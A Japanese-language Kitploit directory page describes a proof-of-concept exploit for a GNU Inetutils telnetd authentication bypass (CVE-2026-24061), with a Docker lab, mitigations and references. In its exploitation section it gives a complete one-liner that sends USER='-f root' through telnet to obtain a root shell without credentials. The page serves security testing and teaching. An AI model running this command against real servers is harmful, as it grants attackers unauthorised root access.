Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-24061 — GNU Inetutils telnetd の認証バイパス (CVE-2026-24061) 用の概念実証エクスプロイトです。Docker ラボ環境と Go PoC を備え、NEW-ENVIRON オプションを悪用して root シェルを取得します。 | Kitploit
ツール/GitHubGitHub/chocapikk/cve-2026-24061
認証と認可脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテスト学習と教育ラボと実践
GitHubchocapikk/cve-2026-24061

CVE-2026-24061

GNU Inetutils telnetd の認証バイパス (CVE-2026-24061) 用の概念実証エクスプロイトです。Docker ラボ環境と Go PoC を備え、NEW-ENVIRON オプションを悪用して root シェルを取得します。

リポジトリを見る
1237ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-24061

GNU Inetutils telnetd リモート認証バイパス

2026年にまだtelnet?マジで?そろそろ次に移ろうよ。SSHは1995年からあるんだぞ。 🤦

説明

GNU Inetutils telnetd のバージョン 1.9.3 から 2.7 に影響を与える深刻な認証バイパス脆弱性です。

この脆弱性は、NEW-ENVIRON telnet オプションを悪用して、login(1) に悪意のある引数を注入します。telnet プロトコル経由で USER=-f root を設定することで、攻撃者は認証をバイパスし、認証情報なしで root シェルを取得できます。

影響を受けるバージョン

  • GNU Inetutils 1.9.3 - 2.7

技術的詳細

telnet プロトコルは、クライアントがサーバーに環境変数を送信できるようにする NEW-ENVIRON オプション(RFC 1572)をサポートしています。telnetd デーモンは USER 変数を login(1) に引数として渡します。

USER=-f root を送信すると、値は次のように解釈されます:

  • -f フラグ: 認証をスキップ(信頼できるホスト)
  • root: 対象ユーザー

これにより login -f root が実行され、即座に root アクセスが許可されます。

PoC は、IAC WILL ECHO(0xff 0xfb 0x01)をチェックすることで悪用の成功を検出します。これは、シェルアクセスが許可されたときにサーバーが送信するプロトコルシグナルです。

ラボ環境のセットアップ

root@kitploit:~
# Build and run the vulnerable telnetd container
docker compose up --build -d

# Test the exploit
go run poc.go 127.0.0.1 2323

悪用

root@kitploit:~
# Using the Go PoC (with interactive shell)
go run poc.go <target> <port>

# Simple PoC using standard telnet client
env USER='-f root' telnet -a <target> <port>

緩和策

  • 2026年にもなってもうtelnetを使うのはやめよう、本当に 🙏
  • 代わりにSSHを使おう(もう31年も前からあるよ。95年生まれの自分はまだ生まれてなかったけど笑)
  • パッチ適用済みの GNU Inetutils バージョンにアップグレードする
  • ファイアウォールルールでtelnetアクセスを制限する

ファイル

  • poc.go - 対話型シェルを備えた Go エクスプロイト
  • Dockerfile - 脆弱な telnetd コンテナ
  • docker-compose.yml - ラボ環境のオーケストレーション

参照

  • アドバイザリ: https://www.openwall.com/lists/oss-security/2026/01/20/2
  • GNU Inetutils: https://www.gnu.org/software/inetutils/
  • RFC 1572 (NEW-ENVIRON): https://tools.ietf.org/html/rfc1572

クレジット

  • LeakIX Research Team
ツールをダウンロード